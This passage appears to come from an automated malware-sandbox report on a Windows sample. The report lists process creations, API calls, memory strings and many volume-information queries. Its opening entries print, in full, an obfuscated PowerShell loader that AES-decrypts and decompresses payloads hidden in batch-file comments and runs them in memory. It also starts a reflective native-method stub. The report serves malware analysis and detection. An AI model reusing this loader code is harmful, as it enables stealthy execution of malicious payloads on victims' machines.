Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:quvobnaugmmc{param([outputtype([type])][parameter(position=0)][type[]]$uwmlljvvwbvuvd,[parameter(position=1)][type]$qjfzfiqcry)$wljbmwfhupi=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+'f'+'l'+''+[char](101)+'c'+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+''+[char](109)+''+[char](111)+'r'+[char](121)+''+[char](77)+''+[char](111)+''+[char](100)+''+'u'+'l'+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+'e'+'l'+''+'e'+''+[char](103)+'a'+[char](116)+'ety'+[char](112)+'e',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+[char](105)+''+[char](99)+''+','+''+[char](83)+''+[char](101)+''+[char](97)+''+[char](108)+''+[char](101)+'d'+[char](44)+''+'a'+''+'n'+'s'+[char](105)+''+'c'+''+[char](108)+''+[char](97)+''+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+[char](108)+'a'+[char](115)+''+[char](115)+'',[multicastdelegate]);$wljbmwfhupi.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+'na'+[char](109)+''+'e'+','+[char](72)+''+[char](105)+''+[char](100)+'e'+'b'+''+'y'+''+'s'+''+[char](105)+''+[char](103)+',pu'+'b'+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$uwmlljvvwbvuvd).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'i'+[char](109)+''+'e'+''+','+''+[char](77)+''+[char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[char](100)+'');$wljbmwfhupi.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+'e',''+[char](80)+'ubl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+'e'+''+[char](66)+''+'y'+''+[char](83)+''+[char](105)+''+'g'+','+'n'+'ew'+'s'+''+[char](108)+''+[char](111)+'t'+','+''+[char](86)+''+'i'+'rt'+'u'+''+[char](97)+''+[char](108)+'',$qjfzfiqcry,$uwmlljvvwbvuvd).setimplementationflags(''+'r'+''+[char](117)+'n'+'t'+''+'i'+'m'+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');write-output $wljbmwfhupi.createtype();}$ulnmlpdbsuvqn=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+[char](101)+''+[char](109)+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+[char](77)+''+[char](105)+'c'+[char](114)+''+'o'+'s'+[char](111)+'f'+[char](116)+''+[char](46)+'wi'+'n'+'3'+'2'+''+[char](46)+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'n'+'a'+'t'+'i'+''+[char](118)+'em'+[char](101)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 37_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 37_2_0000000140002300
Source: dwm.exe, 00000029.00000000.2486830471.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.3084591324.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000022123C02AF0 cpuid 18_3_0000022123C02AF0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
